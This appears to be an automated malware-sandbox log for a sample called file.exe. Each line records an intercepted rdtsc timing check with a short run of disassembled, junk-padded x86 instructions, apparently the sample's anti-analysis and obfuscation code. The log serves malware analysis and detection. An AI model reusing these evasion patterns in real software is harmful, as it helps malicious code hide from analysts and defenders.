                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FACCA second address: 12FACCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414AF second address: 13414B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414B3 second address: 13414D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414D0 second address: 13414D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13415F8 second address: 13415FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13418EC second address: 13418F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13418F2 second address: 13418FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F9EA4BB43C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341A58 second address: 1341A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341A5C second address: 1341A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9EA4BB43C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e jmp 00007F9EA4BB43CCh 0x00000013 jns 00007F9EA4BB43C6h 0x00000019 pop edx 0x0000001a pushad 0x0000001b jc 00007F9EA4BB43C6h 0x00000021 push edi 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341BD3 second address: 1341BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340A0B second address: 1340A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340A0F second address: 1340A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347CEF second address: 1347CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347CF7 second address: 1347D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007F9EA509B5D6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347D08 second address: 1347D29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F9EA4BB43C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346B4F second address: 1346B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346B55 second address: 1346B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346B5B second address: 1346B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F82D0 second address: 12F82DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F9EA4BB43CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8550 second address: 12F8554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F89D9 second address: 12F8A24 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9EA4BB43C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 31960AFAh 0x00000011 mov edi, 7DA3037Eh 0x00000016 call 00007F9EA4BB43C9h 0x0000001b pushad 0x0000001c jmp 00007F9EA4BB43D9h 0x00000021 push ebx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a jl 00007F9EA4BB43C6h 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8A24 second address: 12F8A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F9EA509B5D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ecx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jg 00007F9EA509B5D6h 0x0000001a popad 0x0000001b pop ecx 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push ebx 0x00000020 jmp 00007F9EA509B5DBh 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8A54 second address: 12F8A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8A58 second address: 12F8A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9EA509B5E1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8BE5 second address: 12F8BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8BFA second address: 12F8C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e mov edi, dword ptr [ebp+122D1B78h] 0x00000014 push eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8F96 second address: 12F8F9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8F9C second address: 12F8FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8FB9 second address: 12F8FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F97A7 second address: 12F97D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F9EA509B5E2h 0x0000000d jmp 00007F9EA509B5DCh 0x00000012 nop 0x00000013 mov dh, 42h 0x00000015 push ebx 0x00000016 or ecx, 13A7CC15h 0x0000001c pop edx 0x0000001d lea eax, dword ptr [ebp+1247E0C0h] 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F97D7 second address: 12F97F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F97F4 second address: 12F9812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9812 second address: 12F9816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347142 second address: 1347148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347148 second address: 134714D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134714D second address: 1347153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347471 second address: 1347477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347477 second address: 134748E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134787D second address: 1347883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347883 second address: 1347887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347887 second address: 1347895 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347895 second address: 13478AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A994 second address: 134A9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F9EA4BB43C6h 0x00000009 jc 00007F9EA4BB43C6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9EA4BB43CCh 0x00000017 jmp 00007F9EA4BB43D9h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AB41 second address: 134AB62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F9EA509B5E3h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D3FA second address: 134D413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jne 00007F9EA4BB43C6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F9EA4BB43C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D413 second address: 134D417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D417 second address: 134D425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F9EA4BB43C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D425 second address: 134D429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD59B second address: 12BD5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD5A0 second address: 12BD5B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9EA509B5D6h 0x0000000a jnp 00007F9EA509B5D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D122 second address: 134D12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9EA4BB43C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D12E second address: 134D132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D132 second address: 134D13C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA4BB43C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514C2 second address: 13514CC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9EA509B5E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514CC second address: 13514DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9EA4BB43C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514DE second address: 13514F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9EA509B5E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C76 second address: 1350C94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9EA4BB43C6h 0x00000008 jmp 00007F9EA4BB43D0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C94 second address: 1350C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C98 second address: 1350CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D7h 0x00000007 jmp 00007F9EA4BB43D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E02 second address: 1350E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E0C second address: 1350E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43D4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E26 second address: 1350E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DAh 0x00000007 jmp 00007F9EA509B5DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F9EA509B5D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E49 second address: 1350E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F9EA4BB43C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jbe 00007F9EA4BB43C6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 jmp 00007F9EA4BB43CDh 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F9EA4BB43C6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E77 second address: 1350E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E7D second address: 1350E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E86 second address: 1350E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135541B second address: 135542A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555A7 second address: 13555AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555AD second address: 13555B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555B3 second address: 13555B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555B7 second address: 13555FE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007F9EA4BB43C6h 0x00000014 jp 00007F9EA4BB43C6h 0x0000001a jmp 00007F9EA4BB43CAh 0x0000001f popad 0x00000020 push eax 0x00000021 jns 00007F9EA4BB43C6h 0x00000027 jmp 00007F9EA4BB43D3h 0x0000002c pop eax 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 pop eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355777 second address: 135577C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355BBB second address: 1355BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355BC0 second address: 1355BE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007F9EA509B5E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135A90D second address: 135A913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135AD9F second address: 135ADD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9EA509B5E0h 0x00000008 jno 00007F9EA509B5D6h 0x0000000e jmp 00007F9EA509B5DEh 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F9EA509B5D6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0CD second address: 135B0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9265 second address: 12F9276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F9EA509B5D8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9276 second address: 12F927C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F927C second address: 12F92BD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ecx, dword ptr [ebp+122D3812h] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F9EA509B5D8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov edx, ecx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jne 00007F9EA509B5D6h 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13624BB second address: 13624C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F9EA4BB43C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362B73 second address: 1362B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362E0B second address: 1362E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362E0F second address: 1362E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362E13 second address: 1362E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1363398 second address: 13633BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F9EA509B5D6h 0x0000000c popad 0x0000000d je 00007F9EA509B5DAh 0x00000013 popad 0x00000014 jl 00007F9EA509B5F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13633BA second address: 13633C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13633C0 second address: 13633CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0001 second address: 12B0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jng 00007F9EA4BB43C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0012 second address: 12B0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0016 second address: 12B0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9EA4BB43D5h 0x0000000d jmp 00007F9EA4BB43D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C3E7 second address: 136C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9A1 second address: 136C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9A6 second address: 136C9AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9AB second address: 136C9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
